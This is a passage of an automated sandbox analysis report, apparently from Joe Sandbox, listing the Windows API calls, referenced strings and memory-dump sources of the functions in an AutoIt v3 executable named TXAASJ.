                                                                                                                          • Part of subcall function 00EBD385: GetSysColor.USER32(00000011), ref: 00EBD400
                                                                                                                          • Part of subcall function 00EBD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EBD40E
                                                                                                                          • Part of subcall function 00EBD385: SelectObject.GDI32(?,00000000), ref: 00EBD41F
                                                                                                                          • Part of subcall function 00EBD385: SetBkColor.GDI32(?,00000000), ref: 00EBD428
                                                                                                                          • Part of subcall function 00EBD385: SelectObject.GDI32(?,?), ref: 00EBD435
                                                                                                                          • Part of subcall function 00EBD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00EBD454
                                                                                                                          • Part of subcall function 00EBD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EBD46B
                                                                                                                          • Part of subcall function 00EBD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00EBD480
                                                                                                                          • Part of subcall function 00EBD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EBD4A8
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521893082-0
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00EAA42A
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EAA4E9
                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EAA527
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EAA539
                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EAA57F
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00EAA58B
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EAA5CF
                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EAA5DE
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00EAA5EE
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EAA5F2
                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EAA602
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EAA60B
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00EAA614
                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EAA642
                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EAA659
                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EAA694
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EAA6A8
                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EAA6B9
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EAA6E9
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00EAA6F4
                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EAA6FF
                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EAA709
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E9E45E
                                                                                                                        • GetDriveTypeW.KERNEL32(?,00EEDC88,?,\\.\,00EEDBF0), ref: 00E9E54B
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00EEDC88,?,\\.\,00EEDBF0), ref: 00E9E6B1
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                        • API String ID: 1038674560-86951937
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00EBC598
                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00EBC64E
                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00EBC669
                                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00EBC925
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,00EEDBF0), ref: 00EB6245
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                        • API String ID: 3964851224-45149045
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000012), ref: 00EBD3BE
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00EBD3C2
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EBD3D8
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00EBD3E3
                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 00EBD3E8
                                                                                                                        • GetSysColor.USER32(00000011), ref: 00EBD400
                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EBD40E
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EBD41F
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00EBD428
                                                                                                                        • SelectObject.GDI32(?,?), ref: 00EBD435
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EBD454
                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EBD46B
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EBD480
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EBD4A8
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EBD4CF
                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00EBD4ED
                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 00EBD4F8
                                                                                                                        • GetSysColor.USER32(00000011), ref: 00EBD506
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00EBD50E
                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EBD522
                                                                                                                        • SelectObject.GDI32(?,00EBD0B5), ref: 00EBD539
                                                                                                                        • DeleteObject.GDI32(?), ref: 00EBD544
                                                                                                                        • SelectObject.GDI32(?,?), ref: 00EBD54A
                                                                                                                        • DeleteObject.GDI32(?), ref: 00EBD54F
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00EBD555
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00EBD55F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1996641542-0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EBB5C0
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EBB5D1
                                                                                                                        • CharNextW.USER32(0000014E), ref: 00EBB600
                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EBB641
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EBB657
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EBB668
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EBB685
                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EBB6D7
                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EBB6ED
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EBB71E
                                                                                                                        • _memset.LIBCMT ref: 00EBB743
                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EBB78C
                                                                                                                        • _memset.LIBCMT ref: 00EBB7EB
                                                                                                                        • SendMessageW.USER32 ref: 00EBB815
                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EBB86D
                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00EBB91A
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00EBB93C
                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00EBB986
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EBB9B3
                                                                                                                        • DrawMenuBar.USER32(?), ref: 00EBB9C2
                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EBB9EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EB7587
                                                                                                                        • GetDesktopWindow.USER32 ref: 00EB759C
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00EB75A3
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EB7605
                                                                                                                        • DestroyWindow.USER32(?), ref: 00EB7631
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EB765A
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EB7678
                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EB769E
                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00EB76B3
                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EB76C6
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00EB76E6
                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EB7701
                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EB7715
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00EB772D
                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00EB7753
                                                                                                                        • GetMonitorInfoW.USER32 ref: 00EB776D
                                                                                                                        • CopyRect.USER32(?,?), ref: 00EB7784
                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00EB77EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E976ED
                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E97713
                                                                                                                        • _wcscpy.LIBCMT ref: 00E97741
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9774C
                                                                                                                        • _wcscat.LIBCMT ref: 00E97762
                                                                                                                        • _wcsstr.LIBCMT ref: 00E9776D
                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E97789
                                                                                                                        • _wcscat.LIBCMT ref: 00E977D2
                                                                                                                        • _wcscat.LIBCMT ref: 00E977D9
                                                                                                                        • _wcsncpy.LIBCMT ref: 00E97804
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                        • API String ID: 699586101-1459072770
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E6A839
                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00E6A841
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E6A86C
                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00E6A874
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00E6A899
                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E6A8B6
                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00E6A8C6
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E6A8F9
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E6A90D
                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00E6A92B
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00E6A947
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6A952
                                                                                                                          • Part of subcall function 00E6B736: GetCursorPos.USER32(000000FF), ref: 00E6B749
                                                                                                                          • Part of subcall function 00E6B736: ScreenToClient.USER32(00000000,000000FF), ref: 00E6B766
                                                                                                                          • Part of subcall function 00E6B736: GetAsyncKeyState.USER32(00000001), ref: 00E6B78B
                                                                                                                          • Part of subcall function 00E6B736: GetAsyncKeyState.USER32(00000002), ref: 00E6B799
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00E6ACEE), ref: 00E6A979
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                        APIs
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB3626
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EEDBF0,00000000,?,00000000,?,?), ref: 00EB3694
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EB36DC
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EB3765
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00EB3A85
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EB3A92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                        • API String ID: 536824911-966354055
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00EB6A52
                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EB6B12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                        • API String ID: 3974292440-719923060
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E8DD87
                                                                                                                        • __swprintf.LIBCMT ref: 00E8DE28
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8DE3B
                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E8DE90
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8DECC
                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00E8DF03
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00E8DF55
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E8DF8B
                                                                                                                        • GetParent.USER32(?), ref: 00E8DFA9
                                                                                                                        • ScreenToClient.USER32(00000000), ref: 00E8DFB0
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E8E02A
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E03E
                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00E8E064
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E078
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                        • String ID: %s%u
                                                                                                                        • API String ID: 3119225716-679674701
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00E8E6E1
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E6F2
                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E8E71A
                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00E8E737
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E755
                                                                                                                        • _wcsstr.LIBCMT ref: 00E8E766
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00E8E79E
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E7AE
                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E8E7D5
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00E8E81E
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8E82E
                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00E8E856
                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00E8E8BF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
